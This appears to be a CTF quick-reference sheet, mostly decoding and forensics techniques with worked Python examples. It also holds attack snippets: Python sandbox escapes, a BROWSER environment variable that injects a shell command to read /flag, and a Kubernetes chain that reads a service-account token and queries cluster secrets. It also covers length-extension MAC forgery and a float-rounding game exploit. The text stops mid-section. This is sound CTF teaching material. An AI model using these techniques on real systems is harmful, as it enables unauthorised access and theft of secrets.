ctf-misc

# CTF Miscellaneous
Quick reference for miscellaneous CTF challenges. Each technique has a one-liner here; see supporting files for full details.
## Additional Resources

- pyjails.md - Python jail/sandbox escape techniques
- bashjails.md - Bash jail/restricted shell escape techniques
- encodings.md - Encodings, QR codes, audio, esolangs, SHA-256 length extension, UTF-16 tricks
- rf-sdr.md - RF/SDR/IQ signal processing (QAM-16, carrier recovery, timing sync)
- dns.md - DNS exploitation (ECS spoofing, NSEC walking, IXFR, rebinding, tunneling)
- games-and-vms.md - WASM patching, PyInstaller, marshal, Python env RCE, Z3, K8s RBAC
## General Tips

- Read all provided files carefully
- Check file metadata, hidden content, encoding
- Power Automate scripts may hide API calls
- Use binary search when guessing multiple answers
## Common Encodings

```bash
# Base64
echo "encoded" | base64 -d
# Base32 (A-Z2-7=)
echo "OBUWG32D..." | base32 -d
# Hex
echo "68656c6c6f" | xxd -r -p
# ROT13
echo "uryyb" | tr 'a-zA-Z' 'n-za-mN-ZA-M'
```

**Identify by charset:**
- Base64: `A-Za-z0-9+/=`
- Base32: `A-Z2-7=` (no lowercase)
- Hex: `0-9a-fA-F`

See [encodings.md](encodings.md) for Caesar brute force, URL encoding, and full details.
## IEEE-754 Float Encoding (Data Hiding)

Pattern (Floating): Numbers are float32 values hiding raw bytes.

Key insight: A 32-bit float is just 4 bytes interpreted as a number. Reinterpret as raw bytes -> ASCII.

```python
import struct

floats = [1.234e5, -3.456e-7, ...]  # Whatever the challenge gives
flag = b''
for f in floats:
    flag += struct.pack('>f', f)
print(flag.decode())
```

Variations: Double `'>d'`, little-endian `'<f'`, mixed. See encodings.md for CyberChef recipe.
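The reinterpretation above, as an added example (not code from the page): it repacks the challenge numbers with each of the four width/endianness combinations the Variations line mentions and keeps those whose bytes decode as printable ASCII. The sample values are constructed here by unpacking a known string, so the expected answer is known in advance; more than one format can pass, which is why a solver still has to read the candidates.

```python
import struct

# Constructed sample: three float32 values that are really the bytes of b'flag{f32}!!!'
SAMPLE_FLOATS = list(struct.unpack('>3f', b'flag{f32}!!!'))


def decode_floats(values, fmt):
    """Repack each number with a struct format ('>f', '<f', '>d', '<d') and return the raw bytes."""
    return b''.join(struct.pack(fmt, v) for v in values)


def is_plausible_text(data):
    """True when every byte is printable ASCII or ordinary whitespace."""
    return len(data) > 0 and all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def try_all_formats(values):
    """Return {fmt: text} for every width/endianness whose repacked bytes look like text.
    Little-endian float32 yields the same bytes in 4-byte reversed chunks, so both '>f'
    and '<f' can look plausible; the caller picks the reading that makes sense."""
    results = {}
    for fmt in ('>f', '<f', '>d', '<d'):
        try:
            data = decode_floats(values, fmt)
        except (OverflowError, struct.error):
            continue  # value does not fit float32, or is not a number at all
        if is_plausible_text(data):
            results[fmt] = data.decode('ascii')
    return results


if __name__ == '__main__':
    for fmt, text in try_all_formats(SAMPLE_FLOATS).items():
        print(fmt, repr(text))
```

Values that came from a float32 survive the round trip through a Python float exactly, so the big-endian reading reproduces the original bytes; the double formats are rejected because a float32 mantissa widened to 64 bits always ends in zero bytes.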
## USB Mouse PCAP Reconstruction

Pattern (Hunt and Peck): USB HID mouse traffic captures on-screen keyboard typing.

Workflow:
- Open PCAP in Wireshark -- identify USBPcap with HID interrupt transfers
- Identify device (Device Descriptor -> manufacturer/product)
- Use USB-Mouse-Pcap-Visualizer: github.com/WangYihang/USB-Mouse-Pcap-Visualizer
- Extract click coordinates (falling edges of `left_button_holding`)
- Plot clicks on scatter plot with matplotlib
- Overlay on image of Windows On-Screen Keyboard
- Animate clicks in order to read typed text

Key details:
- Mouse reports relative coordinates (deltas), not absolute
- Cumulative sum of deltas gives position track
- Rising/falling edges of button state = click start/end
- Need to scale/stretch overlay to match OSK layout

```python
import pandas as pd
import matplotlib.pyplot as plt

df = pd.read_csv('mouse_data.csv')

# Find click positions (falling edges)
clicks = df[(df['left_button_holding'].shift(1) == True) & (df['left_button_holding'] == False)]

# Cumulative position from relative deltas
x_pos = df['x'].cumsum()
y_pos = df['y'].cumsum()

# Plot clicks over OSK image
click_x = x_pos[clicks.index]
click_y = y_pos[clicks.index]
plt.scatter(click_x, click_y, c='red', s=50)
plt.show()
```
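The delta integration and edge detection from the key details above, as an added pure-Python example (not the visualizer's or the page's code, and no pandas needed). The reports are a constructed list in the same shape as the CSV columns `x`, `y`, `left_button_holding`; it also shows why the choice of edge matters when the cursor moves between press and release, and the scaling step for the OSK overlay.

```python
# Constructed sample of HID mouse reports as (dx, dy, left_button_holding).
SAMPLE_REPORTS = [
    (10, 5, False), (10, 5, False), (0, 0, True), (0, 0, False),  # press/release at (20, 10)
    (-5, 20, False), (0, 0, True), (0, 0, True), (1, 0, False),   # press at (15, 30), release at (16, 30)
    (30, 0, False), (0, 0, True),                                 # button still held when capture ends
]


def cumulative_positions(reports):
    """Integrate relative deltas into an absolute track (HID mice only report deltas)."""
    x = y = 0
    track = []
    for dx, dy, _held in reports:
        x += dx
        y += dy
        track.append((x, y))
    return track


def click_positions(reports, edge='press'):
    """Positions at button edges. 'press' = rising edge (False -> True);
    'release' = falling edge (True -> False), which is what the pandas filter above selects."""
    track = cumulative_positions(reports)
    clicks = []
    for i in range(1, len(reports)):
        prev_held, held = reports[i - 1][2], reports[i][2]
        if edge == 'press' and held and not prev_held:
            clicks.append(track[i])
        elif edge == 'release' and prev_held and not held:
            clicks.append(track[i])
    return clicks


def scale_to_overlay(points, width, height):
    """Stretch raw click coordinates onto a width x height keyboard image (min..max -> 0..size)."""
    xs = [p[0] for p in points]
    ys = [p[1] for p in points]
    span_x = (max(xs) - min(xs)) or 1
    span_y = (max(ys) - min(ys)) or 1
    return [(round((x - min(xs)) * width / span_x), round((y - min(ys)) * height / span_y))
            for x, y in points]


if __name__ == '__main__':
    for edge in ('press', 'release'):
        print(edge, click_positions(SAMPLE_REPORTS, edge))
```

A press that never sees its release (the last report) only appears in the rising-edge list, so comparing both lists is a cheap sanity check that no keystroke was dropped before overlaying on the keyboard image.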
## File Type Detection

```bash
file unknown_file
xxd unknown_file | head
binwalk unknown_file
```
## Archive Extraction

```bash
7z x archive.7z           # Universal
tar -xzf archive.tar.gz   # Gzip
tar -xjf archive.tar.bz2  # Bzip2
tar -xJf archive.tar.xz   # XZ
```
## Nested Archive Script

```bash
while f=$(ls *.tar* *.gz *.bz2 *.xz *.zip *.7z 2>/dev/null | head -1) && [ -n "$f" ]; do
    7z x -y "$f" && rm "$f"
done
```
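An added example (not the page's script) of the same loop in Python, using the standard library instead of 7z: archives are recognised by magic bytes rather than extension, tar and zip member paths are checked before extraction, and a round limit stops the loop on an archive bomb, which the shell loop above would unpack forever. The three-deep fixture is constructed by `build_demo`; file names and the flag are placeholders.

```python
import bz2, gzip, lzma, os, shutil, tarfile, tempfile, zipfile

MAX_ROUNDS = 20  # nesting cap: an unbounded loop never terminates on an archive bomb


def archive_type(path):
    """Classify by magic bytes rather than extension (CTF files are often misnamed)."""
    with open(path, 'rb') as fh:
        head = fh.read(4)
        fh.seek(257)
        tar_tag = fh.read(5)
    if head.startswith(b'\x1f\x8b'):
        return 'gzip'
    if head.startswith(b'BZh'):
        return 'bzip2'
    if head.startswith(b'\xfd7zX'):
        return 'xz'
    if head.startswith(b'PK\x03\x04'):
        return 'zip'
    if tar_tag == b'ustar':
        return 'tar'
    return None


def check_members(names, dest):
    """Refuse members that would land outside dest (absolute paths, '..' traversal)."""
    root = os.path.realpath(dest)
    for name in names:
        target = os.path.realpath(os.path.join(root, name))
        if target != root and not target.startswith(root + os.sep):
            raise ValueError(f'unsafe member path: {name}')


def extract_one(path, dest):
    """Unpack a single archive into dest, delete it, and return the detected type."""
    kind = archive_type(path)
    base = os.path.basename(path)
    stem = base.rsplit('.', 1)[0] if '.' in base else base + '.out'
    if kind == 'tar':
        kw = {'filter': 'data'} if hasattr(tarfile, 'data_filter') else {}  # Python 3.12+
        with tarfile.open(path) as tf:
            check_members(tf.getnames(), dest)
            tf.extractall(dest, **kw)
    elif kind == 'zip':
        with zipfile.ZipFile(path) as zf:
            check_members(zf.namelist(), dest)
            zf.extractall(dest)
    elif kind in ('gzip', 'bzip2', 'xz'):
        opener = {'gzip': gzip.open, 'bzip2': bz2.open, 'xz': lzma.open}[kind]
        with opener(path, 'rb') as src, open(os.path.join(dest, stem), 'wb') as dst:
            shutil.copyfileobj(src, dst)
    else:
        raise ValueError(f'not an archive: {path}')
    os.remove(path)
    return kind


def unpack_nested(directory, max_rounds=MAX_ROUNDS):
    """Unpack archives in directory one at a time until none are left; returns the types seen."""
    kinds = []
    for _ in range(max_rounds):
        found = [os.path.join(directory, n) for n in sorted(os.listdir(directory))]
        found = [p for p in found if os.path.isfile(p) and archive_type(p)]
        if not found:
            return kinds
        kinds.append(extract_one(found[0], directory))
    raise RuntimeError(f'archives still present after {max_rounds} rounds; possible archive bomb')


def build_demo(directory):
    """Constructed fixture: outer.tar -> inner.tar.gz -> inner.tar -> flag.txt."""
    flag = os.path.join(directory, 'flag.txt')
    with open(flag, 'w') as fh:
        fh.write('flag{nested}\n')
    inner = os.path.join(directory, 'inner.tar')
    with tarfile.open(inner, 'w') as tf:
        tf.add(flag, arcname='flag.txt')
    os.remove(flag)
    with open(inner, 'rb') as src, gzip.open(inner + '.gz', 'wb') as dst:
        shutil.copyfileobj(src, dst)
    os.remove(inner)
    with tarfile.open(os.path.join(directory, 'outer.tar'), 'w') as tf:
        tf.add(inner + '.gz', arcname='inner.tar.gz')
    os.remove(inner + '.gz')


def demo():
    """Build the fixture in a temp dir, unpack it, and return (types seen, flag text)."""
    workdir = tempfile.mkdtemp()
    try:
        build_demo(workdir)
        kinds = unpack_nested(workdir)
        with open(os.path.join(workdir, 'flag.txt')) as fh:
            return kinds, fh.read().strip()
    finally:
        shutil.rmtree(workdir)


if __name__ == '__main__':
    print(demo())
```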
## QR Codes

```bash
zbarimg qrcode.png          # Decode
qrencode -o out.png "data"  # Encode
```

See encodings.md for QR structure, repair techniques, and chunk reassembly.
## Audio Challenges

```bash
sox audio.wav -n spectrogram  # Visual data
qsstv                         # SSTV decoder
```
## RF / SDR / IQ Signal Processing

See rf-sdr.md for full details (IQ formats, QAM-16 demod, carrier/timing recovery).

Quick reference:
- cf32: `np.fromfile(path, dtype=np.complex64)` | cs16: int16 reshape(-1,2) | cu8: RTL-SDR raw
- Circles in constellation = frequency offset; Spirals = offset + time-varying phase
- 4-fold ambiguity in DD carrier recovery - try 0/90/180/270 rotation
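The three IQ sample formats from the quick reference, as an added pure-Python example (not the page's or rf-sdr.md's code) that does what the `np.fromfile` + reshape one-liners do, plus the four candidate rotations for the decision-directed ambiguity. The sample buffers are constructed; the cs16 scale of 32768 and the cu8 centre of 127.5 are the usual conventions, stated here as assumptions.

```python
import struct


def load_iq(raw, fmt):
    """Decode raw interleaved I/Q bytes into complex samples.
    cf32: float32 pairs; cs16: int16 pairs scaled to +-1; cu8: RTL-SDR unsigned 8-bit pairs
    centred on 127.5. Little-endian throughout (assumption: x86 capture host)."""
    if fmt == 'cf32':
        n = len(raw) // 8
        v = struct.unpack('<%df' % (2 * n), raw[:8 * n])
        return [complex(v[2 * i], v[2 * i + 1]) for i in range(n)]
    if fmt == 'cs16':
        n = len(raw) // 4
        v = struct.unpack('<%dh' % (2 * n), raw[:4 * n])
        return [complex(v[2 * i] / 32768.0, v[2 * i + 1] / 32768.0) for i in range(n)]
    if fmt == 'cu8':
        n = len(raw) // 2
        return [complex((raw[2 * i] - 127.5) / 127.5, (raw[2 * i + 1] - 127.5) / 127.5)
                for i in range(n)]
    raise ValueError(f'unknown IQ format {fmt!r}')


def rotation_candidates(samples):
    """The four 90-degree rotations a decision-directed loop cannot tell apart; try each
    against the expected preamble or symbol map before giving up on a demod."""
    return {deg: [s * (1j ** k) for s in samples] for k, deg in enumerate((0, 90, 180, 270))}


# Constructed sample buffers
CF32_SAMPLE = struct.pack('<4f', 1.0, 2.0, 3.0, 4.0)   # (1+2j), (3+4j)
CS16_SAMPLE = struct.pack('<4h', 16384, 0, 0, -16384)  # 0.5, -0.5j
CU8_SAMPLE = bytes([255, 127, 0, 255])                 # ~(1+0j), (-1+1j)

if __name__ == '__main__':
    print(load_iq(CF32_SAMPLE, 'cf32'), load_iq(CS16_SAMPLE, 'cs16'), load_iq(CU8_SAMPLE, 'cu8'))
    print(rotation_candidates(load_iq(CF32_SAMPLE, 'cf32')))
```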
## pwntools Interaction

```python
from pwn import *

r = remote('host', port)
r.recvuntil(b'prompt: ')
r.sendline(b'answer')
r.interactive()
```
## Python Jail Quick Reference

Enumerate functions:

```python
import string

for c in string.printable:
    result = test(f"{c}()")  # test(): the challenge's eval-and-return helper
    if "error" not in result.lower():
        print(f"Found: {c}()")
```

Oracle pattern (L, Q, S functions):

```python
flag = ''
flag_len = int(test("L()"))  # L(): length oracle provided by the challenge
for i in range(flag_len):
    for c in range(32, 127):
        if query(i, c) == 0:  # query(i, c): 0 when flag[i] == chr(c)
            flag += chr(c)
            break
```

Bypass character restrictions:

```python
# Walrus operator
(abcdef := "new_allowed_chars")

# Octal escapes
'\141'  # evaluates to 'a'
```

**Decorator bypass (ast.Call banned, no quotes, no `=`):**

```python
# Decorators = function calls + assignment without ast.Call or =
# function.__name__ = strings without quotes
# See pyjails.md "Decorator-Based Escape" for full technique
# (func: any existing function; __name__ must be bound to a function so that
#  __name__.__name__ is the string '__name__')
@__import__
@func.__class__.__dict__[__name__.__name__].__get__  # name extractor
def os():
    0

# Result: os = __import__("os")
```

**String join bypass (`+` blocked):** `open(''.join(['fl','ag.txt'])).read()` -- see [pyjails.md](pyjails.md) for more.
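Why the decorator trick above defeats a filter that only bans `ast.Call`, shown from the filter's side as an added example (not the page's or pyjails.md's code): the snippet is parsed, never executed. The naive checker walks the AST for `Call` nodes and finds none, because decoration and the implicit assignment of the result are not `Call` nodes; the hardened variant also rejects decorators, dunder attribute and name access, and walrus assignment. The sample snippets are constructed from the patterns listed above.

```python
import ast

# Constructed inputs: the decorator pattern and the walrus pattern from the quick reference
DECORATOR_SAMPLE = (
    "@__import__\n"
    "@func.__class__.__dict__[__name__.__name__].__get__\n"
    "def os():\n"
    "    0\n"
)
WALRUS_SAMPLE = "(abcdef := 'new_allowed_chars')"


def naive_is_safe(src):
    """The filter the decorator trick targets: reject only explicit call expressions."""
    tree = ast.parse(src)
    return not any(isinstance(node, ast.Call) for node in ast.walk(tree))


def hardened_check(src):
    """Return the list of reasons the snippet is rejected (empty list = allowed).
    Deny-listing syntax is still weaker than allow-listing a tiny grammar; this only
    closes the specific holes named on this page."""
    reasons = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            reasons.append('call')
        elif isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)) and node.decorator_list:
            reasons.append(f'decorator on {node.name}')  # decorators call and assign implicitly
        elif isinstance(node, ast.Attribute) and node.attr.startswith('__'):
            reasons.append(f'dunder attribute {node.attr}')
        elif isinstance(node, ast.Name) and node.id.startswith('__'):
            reasons.append(f'dunder name {node.id}')
        elif isinstance(node, ast.NamedExpr):
            reasons.append('walrus assignment')
    return reasons


if __name__ == '__main__':
    print('naive accepts decorator sample:', naive_is_safe(DECORATOR_SAMPLE))
    print('hardened reasons:', hardened_check(DECORATOR_SAMPLE))
```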
## Z3 Constraint Solving

```python
from z3 import *

FLAG_LEN = 32  # placeholder: take the length from the challenge
flag = [BitVec(f'f{i}', 8) for i in range(FLAG_LEN)]
s = Solver()
s.add(flag[0] == ord('f'))  # Known prefix
# Add constraints...
if s.check() == sat:
    print(bytes([s.model()[f].as_long() for f in flag]))
```

See [games-and-vms.md](games-and-vms.md) for YARA rules with Z3 and type systems as constraints.
## Hash Identification

By constants:
- MD5: `0x67452301`
- SHA-256: `0x6a09e667`
- MurmurHash64A: `0xC6A4A7935BD1E995`
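The constant lookup above, as an added example (not the page's code) that scans a binary blob for the listed constants in both byte orders and reports offsets. One caveat a practitioner wants: MD5 and SHA-1 share their first four initialisation words, so `0x67452301` alone cannot separate them; SHA-1's fifth word `0xC3D2E1F0` can. The blob is constructed.

```python
HASH_CONSTANTS = {
    'MD5 or SHA-1 (IV 0x67452301)': 0x67452301,    # MD5 and SHA-1 share their first four IV words
    'SHA-1 (IV 0xC3D2E1F0)': 0xC3D2E1F0,           # fifth SHA-1 word, absent from MD5
    'SHA-256 (IV 0x6a09e667)': 0x6a09e667,
    'MurmurHash64A (0xC6A4A7935BD1E995)': 0xC6A4A7935BD1E995,
}


def find_hash_constants(blob):
    """Scan a binary for known hash constants in both byte orders; returns (offset, name, endian)."""
    hits = []
    for name, value in HASH_CONSTANTS.items():
        width = (value.bit_length() + 7) // 8
        for endian in ('little', 'big'):
            pattern = value.to_bytes(width, endian)
            start = 0
            while (pos := blob.find(pattern, start)) != -1:
                hits.append((pos, name, endian))
                start = pos + 1
    return sorted(hits)


def identify(blob):
    """Just the algorithm names, deduplicated and sorted."""
    return sorted({name for _, name, _ in find_hash_constants(blob)})


# Constructed blob: filler, an MD5/SHA-1 IV word little-endian, more filler, the Murmur multiplier
SAMPLE_BLOB = (b'\x00' * 7 + (0x67452301).to_bytes(4, 'little') + b'\x90' * 5
               + (0xC6A4A7935BD1E995).to_bytes(8, 'little') + b'\xcc' * 3)

if __name__ == '__main__':
    for hit in find_hash_constants(SAMPLE_BLOB):
        print(hit)
```

In a real binary the constants are usually embedded as immediates or in a table, so little-endian hits dominate on x86; a big-endian hit often means a network-order lookup table rather than code.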
## SHA-256 Length Extension Attack

Pattern: MAC = `SHA-256(SECRET || message)` with known message and hash. Forge valid MAC without knowing SECRET.

```python
import hlextend

sha = hlextend.new('sha256')
new_data = sha.extend(b'extension', b'original_message', len_secret, known_hash_hex)
new_hash = sha.hexdigest()
```

Vulnerable: SHA-256, MD5, SHA-1. NOT vulnerable: HMAC, SHA-3. See encodings.md for full attack steps.
## PyInstaller Extraction

```bash
python pyinstxtractor.py packed.exe
# Look in packed.exe_extracted/
```

See [games-and-vms.md](games-and-vms.md) for opcode remapping and marshal analysis.
## Marshal Code Analysis

```python
import marshal, dis

with open('file.bin', 'rb') as f:
    code = marshal.load(f)
dis.dis(code)
```
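The same workflow as an added example (not the page's code) on a `.pyc` built in memory: the 16-byte header is parsed first, because `marshal.loads` only works when the running interpreter matches the magic number, and its code-object format is otherwise misread or rejected. Unmarshalling builds objects without executing anything; the disassembly, names and string constants are what a solver looks at first. The source and file name are constructed; the header layout assumed is the PEP 552 timestamp variant.

```python
import dis, importlib.util, io, marshal, struct

SAMPLE_SOURCE = "import os\nflag = 'flag{demo}'\nprint(flag)\n"  # constructed


def build_pyc(source, filename='challenge.py'):
    """Constructed fixture: an in-memory .pyc with the 16-byte header (magic, flags, mtime, size)."""
    code = compile(source, filename, 'exec')
    header = importlib.util.MAGIC_NUMBER + struct.pack('<III', 0, 0, len(source.encode()))
    return header + marshal.dumps(code)


def inspect_pyc(blob):
    """Parse the header, unmarshal the code object and collect names, strings and disassembly."""
    magic = blob[:4]
    flags, _field1, _field2 = struct.unpack('<III', blob[4:16])
    info = {
        'magic': int.from_bytes(magic[:2], 'little'),  # version-specific number
        'magic_matches_interpreter': magic == importlib.util.MAGIC_NUMBER,
        'hash_based': bool(flags & 1),                  # PEP 552: hash instead of mtime/size
    }
    if not info['magic_matches_interpreter']:
        return info  # run this under the interpreter version the magic names instead
    code = marshal.loads(blob[16:])  # builds a code object; nothing runs
    out = io.StringIO()
    dis.dis(code, file=out)
    info.update({
        'names': list(code.co_names),
        'strings': [c for c in code.co_consts if isinstance(c, str)],
        'disassembly': out.getvalue(),
    })
    return info


if __name__ == '__main__':
    report = inspect_pyc(build_pyc(SAMPLE_SOURCE))
    print(report['magic'], report['names'], report['strings'])
    print(report['disassembly'])
```

If the file is a bare marshal dump (as from PyInstaller's extracted modules) there is no header; pyinstxtractor prepends a matching one, and a mismatched interpreter is the usual reason `marshal.load` raises.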
## Python Environment RCE

```bash
PYTHONWARNINGS=ignore::antigravity.Foo::0
BROWSER="/bin/sh -c 'cat /flag' %s"
```

See games-and-vms.md for other dangerous env vars and full explanation.
## WASM Game Exploitation via Patching

Pattern: Game with unbeatable AI in WASM. Patch minimax to play badly, proofs still validate.

```bash
wasm2wat main.wasm -o main.wat
# Flip bestScore init and comparison operator
wat2wasm main.wat -o main_patched.wasm
```

See [games-and-vms.md](games-and-vms.md) for full exploitation code and JS integration.
## Floating-Point Precision Exploitation

Pattern (Spare Me Some Change): Trading/economy games where large multipliers amplify tiny floating-point errors.

Key insight: When decimal values (0.01-0.99) are multiplied by large numbers (e.g., 1e15), floating-point representation errors create fractional remainders that can be exploited.

### Finding Exploitable Values

```python
mult = 1000000000000000  # 10^15

# Find values where multiplication creates useful fractional errors
for i in range(1, 100):
    x = i / 100.0
    result = x * mult
    frac = result - int(result)
    if frac > 0:
        print(f'x={x}: {result} (fraction={frac})')
```

Common values with positive fractions:

```
0.07 -> 70000000000000.0078125
0.14 -> 140000000000000.015625
0.27 -> 270000000000000.03125
0.56 -> 560000000000000.0625
```

### Exploitation Strategy

- Identify the constraint: Need `balance >= price` AND `inventory >= fee`
- Find favorable FP error: Value where `x * mult` has positive fraction
- Key trick: Sell the INTEGER part of inventory, keeping the fractional "free money"

Example (time-travel trading game):

```
Initial: balance=5.00, inventory=0.00, flag_price=5.00, fee=0.05
Multiplier: 1e15 (time travel)

# Buy 0.56, travel through time:
balance = (5.0 - 0.56) * 1e15 = 4439999999999999.5
inventory = 0.56 * 1e15 = 560000000000000.0625

# Sell exactly 560000000000000 (integer part):
balance = 4439999999999999.5 + 560000000000000 = 5000000000000000.0 (FP rounds!)
inventory = 560000000000000.0625 - 560000000000000 = 0.0625 > 0.05 fee

# Now: balance >= flag_price AND inventory >= fee
```

### Why It Works

- Float64 has ~15-16 significant digits precision
- `(5.0 - 0.56) * 1e15` loses precision -> rounds to exact 5e15 when added
- `0.56 * 1e15` keeps the 0.0625 fraction as "free inventory"
- The asymmetric rounding gives you slightly more total value than you started with

### Red Flags in Challenges

- "Time travel amplifies everything" (large multipliers)
- Trading games with buy/sell + special actions
- Decimal currency with fees or thresholds
- "No decimals allowed" after certain operations (forces integer transactions)
- Starting values that seem impossible to win with normal math

### Quick Test Script

```python
def find_exploit(mult, balance_needed, inventory_needed):
    """Find x where selling int(x*mult) gives balance>=needed with inv>=needed"""
    for i in range(1, 500):
        x = i / 100.0
        if x >= 5.0:  # Can't buy more than balance
            break
        inv_after = x * mult
        bal_after = (5.0 - x) * mult
        # Sell integer part of inventory
        sell = int(inv_after)
        final_bal = bal_after + sell
        final_inv = inv_after - sell
        if final_bal >= balance_needed and final_inv >= inventory_needed:
            print(f'EXPLOIT: buy {x}, sell {sell}')
            print(f'  final_balance={final_bal}, final_inventory={final_inv}')
            return x
    return None
```

Example usage:

```python
find_exploit(1e15, 5e15, 0.05)  # Returns 0.56
```
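The worked 0.56 example and the fix for it, as an added example (not the page's script): the same buy / multiply / sell-the-integer-part simulation is run once in float64, reproducing the 5e15 and 0.0625 figures above, and once with exact `Fraction` arithmetic, which is what a game using integer minor units or `Decimal` would compute. In exact arithmetic the integer part of the inventory is the whole inventory, so the constraint pair can never be met and the search returns nothing. Scenario values are the page's; the `Fraction` variant is the added mitigation check.

```python
from fractions import Fraction


def simulate(x, mult, start_balance):
    """Buy x, apply the multiplier, sell the integer part of the inventory (the page's trick).
    Works unchanged for floats and for exact Fraction values."""
    inventory = x * mult
    balance = (start_balance - x) * mult
    sold = int(inventory)
    return balance + sold, inventory - sold


def find_first(mult, start_balance, balance_needed, fee, price):
    """First purchase price (hundredths, built by `price`) whose final state meets both constraints."""
    for i in range(1, 500):
        x = price(i, 100)
        if x >= start_balance:  # can't buy more than the balance
            break
        balance, inventory = simulate(x, mult, start_balance)
        if balance >= balance_needed and inventory >= fee:
            return x
    return None


def find_first_float():
    """The page's scenario in float64: an exploitable price exists."""
    return find_first(1e15, 5.0, 5e15, 0.05, lambda n, d: n / d)


def find_first_exact():
    """Same scenario in exact arithmetic (integer minor units / Decimal behave the same):
    selling the integer part of an exact inventory leaves exactly zero, so no price qualifies."""
    return find_first(Fraction(10) ** 15, Fraction(5), Fraction(5 * 10 ** 15), Fraction(5, 100),
                      lambda n, d: Fraction(n, d))


if __name__ == '__main__':
    print('float64 0.56 ->', simulate(0.56, 1e15, 5.0))
    print('float64 first hit:', find_first_float(), ' exact first hit:', find_first_exact())
```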
## Kubernetes RBAC Bypass

Pattern (CTFaaS): Container deployer with claimed ServiceAccount isolation.

Attack chain: Deploy probe -> read SA token -> impersonate deployer -> hostPath mount -> extract kubeconfig -> read secrets.

```bash
# From inside pod:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -k -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default.svc/api/v1/namespaces/hidden/secrets/flag
```

See [games-and-vms.md](games-and-vms.md) for full attack chain and K8s privilege escalation checklist.
## 3D Printer Video Nozzle Tracking (LACTF 2026)

Pattern (flag-irl): Video of 3D printer fabricating nameplate. Flag is the printed text.

Technique: Track nozzle X/Y positions from video frames, filter for print moves (top/text layer only), plot 2D histogram to reveal letter shapes:

1. Identify text layer frames (e.g., frames 26100-28350)
2. Track print head X position (physical X-axis)
3. Track bed X position (physical Y-axis from camera angle)
4. Filter for moves with extrusion (head moving while printing)
5. Plot as 2D scatter/histogram -> letters appear
```
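Steps 1, 4 and 5 of the procedure above, as an added example (not the page's or the challenge author's code) on a constructed tracking table of `(frame, x, y, extruding)` rows: the frame window keeps only the text layer, the extrusion flag drops travel moves, and the survivors are binned into a text-mode 2D histogram where the letter shape becomes visible. The sample traces a single "L"; the tracking itself (steps 2 and 3) is assumed to have produced the table.

```python
# Constructed tracking output: (frame, x, y, extruding)
SAMPLE_TRACK = (
    [(26100 + i, 0, i, True) for i in range(5)]          # vertical stroke of an "L"
    + [(26200 + i, i, 4, True) for i in range(1, 5)]      # horizontal stroke
    + [(26300, 4, 0, False), (26301, 2, 2, False)]        # travel moves, nozzle not extruding
    + [(100, 2, 2, True), (30000, 3, 1, True)]            # extrusion on other layers
)


def print_moves(track, first_frame, last_frame):
    """Step 1 + step 4: keep extruding moves inside the text-layer frame window."""
    return [(x, y) for frame, x, y, extruding in track
            if first_frame <= frame <= last_frame and extruding]


def histogram_2d(points, cols, rows):
    """Step 5: bin points into a cols x rows grid; returns counts, y increasing downwards."""
    xs = [p[0] for p in points]
    ys = [p[1] for p in points]
    x0, x1 = min(xs), max(xs)
    y0, y1 = min(ys), max(ys)
    grid = [[0] * cols for _ in range(rows)]
    for x, y in points:
        cx = min(cols - 1, int((x - x0) / (x1 - x0 + 1e-9) * cols)) if x1 > x0 else 0
        cy = min(rows - 1, int((y - y0) / (y1 - y0 + 1e-9) * rows)) if y1 > y0 else 0
        grid[cy][cx] += 1
    return grid


def render(grid):
    """Text rendering of the histogram: '#' where any print move landed."""
    return [''.join('#' if count else '.' for count in row) for row in grid]


if __name__ == '__main__':
    moves = print_moves(SAMPLE_TRACK, 26100, 28350)
    print('\n'.join(render(histogram_2d(moves, 5, 5))))
```

Without the extrusion filter the two travel points would add a stray mark at the top right and smear the middle of the letter; with real tracking output the grid resolution is the knob to turn until strokes separate.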
## Useful One-Liners

```bash
grep -rn "flag{" .
strings file | grep -i flag
python3 -c "print(int('deadbeef', 16))"
```
## Keyboard Shift Cipher

Pattern (Frenzy): Characters shifted left/right on QWERTY keyboard layout.

Identification: dCode Cipher Identifier suggests "Keyboard Shift Cipher"

Decoding: Use dCode Keyboard Shift Cipher with automatic mode.
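An offline equivalent of the dCode tool, as an added example (not dCode's or the page's code): every letter is moved along its QWERTY row by a signed offset, and "automatic mode" is approximated by producing all small left/right shifts for a quick read or a wordlist score. Wrapping at the row ends and leaving digits and punctuation untouched are assumptions; the sample strings are constructed.

```python
QWERTY_ROWS = ('qwertyuiop', 'asdfghjkl', 'zxcvbnm')


def shift_qwerty(text, offset):
    """Move each letter `offset` keys along its QWERTY row (negative = left), wrapping at the ends.
    Case is preserved; characters not on a letter row pass through unchanged."""
    out = []
    for ch in text:
        low = ch.lower()
        for row in QWERTY_ROWS:
            if low in row:
                shifted = row[(row.index(low) + offset) % len(row)]
                out.append(shifted.upper() if ch.isupper() else shifted)
                break
        else:
            out.append(ch)
    return ''.join(out)


def candidates(ciphertext, max_offset=2):
    """All non-zero shifts up to max_offset in either direction, keyed by offset."""
    return {k: shift_qwerty(ciphertext, k) for k in range(-max_offset, max_offset + 1) if k}


def best_candidate(ciphertext, words=('the', 'flag', 'and', 'test')):
    """Pick the shift whose output contains the most words from a (constructed) wordlist."""
    scored = {k: sum(v.lower().count(w) for w in words) for k, v in candidates(ciphertext).items()}
    return max(scored, key=scored.get)


if __name__ == '__main__':
    print(candidates('yrdy gash'))
    print(best_candidate('yrdy gash'))
```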
## Pigpen / Masonic Cipher

Pattern (Working For Peanuts): Geometric symbols representing letters based on grid positions.

Identification: Angular/geometric symbols, challenge references "Peanuts" comic (Charlie Brown), "dusty looking crypto"

Decoding: Map symbols to Pigpen grid positions, or use online decoder.
## ASCII in Numeric Data Columns

Pattern (Cooked Books): CSV/spreadsheet numeric values (48-126) are ASCII character codes.

```python
import csv

with open('data.csv') as f:
    reader = csv.DictReader(f)
    flag = ''.join(chr(int(row['Times Borrowed'])) for row in reader)
print(flag)
```

CyberChef: "From Decimal" recipe with line feed delimiter.
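The snippet above assumes you already know which column carries the codes. This added example (not the page's code) generalises it: it scans every column of a CSV for values that are all integers in the printable-ASCII range, then decodes the matching column. The spreadsheet is constructed in memory; its `Year` column is numeric but out of range, which is the false positive the range check exists to reject.

```python
import csv, io

# Constructed spreadsheet: the 'Times Borrowed' column spells flag{csv} in decimal ASCII
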